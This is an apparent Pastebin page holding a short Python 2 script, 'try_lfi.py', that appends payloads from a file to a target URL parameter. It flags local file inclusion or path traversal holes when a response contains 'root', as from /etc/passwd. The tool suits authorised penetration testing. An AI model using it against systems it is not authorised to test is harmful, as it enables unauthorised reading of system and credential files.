SHARE
TWEET

webscan module - try LFI

a guest Mar 20th, 2013 174 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  #!/usr/bin/env python
  2.  # ----
  3.  # try_lfi.py - simple find if there is LFI vulnerability
  4.  # ----
  5.  # - can be also used to find traversal-vulnerabilities
  6.  # - tests can be extended to find more information than just passwd file.
  7.  # more @ http://hauntit.blogspot.com
  8.  
  9.  import urllib
  10.  import sys
  11.  
  12.  #defines:
  13.  url=sys.argv[1]
  14.  checkLfis = open('LFItext.txt','r')
  15.  try_lfi = checkLfis.readlines()
  16.  
  17.  if len(sys.argv) < 2:
  18.    sys.stderr.write('usage: '+sys.argv[0]+' http://localhost/page?param=')
  19.    sys.exit(1)
  20.  else:
  21.    print '---------------------------------------------------------------'
  22.    print '[+] Searching for traversal/LFI vulnerability at URL: ', url
  23.    print '---------------------------------------------------------------'
  24.  
  25.    i=0
  26.    for line in try_lfi:
  27.      full_url_to_check = url+line
  28.      try_page = urllib.urlopen(full_url_to_check)
  29.      read_page = try_page.readlines()
  30.      i=i+1
  31.  
  32.      print 'Trying: ',line
  33.      print 'Status: ', try_page.getcode()
  34.      print '\t[~] Now reading the answer to find out if there is our \'vulnerable-string\'...'
  35.  
  36.      for read_lines in read_page:
  37.        if read_lines.find('root') != -1:
  38.          print '\t[+] Found potential LFI bug! This is the answer: ', read_lines  
  39.    print '---------------------------------------------------------------'
RAW Paste Data
Top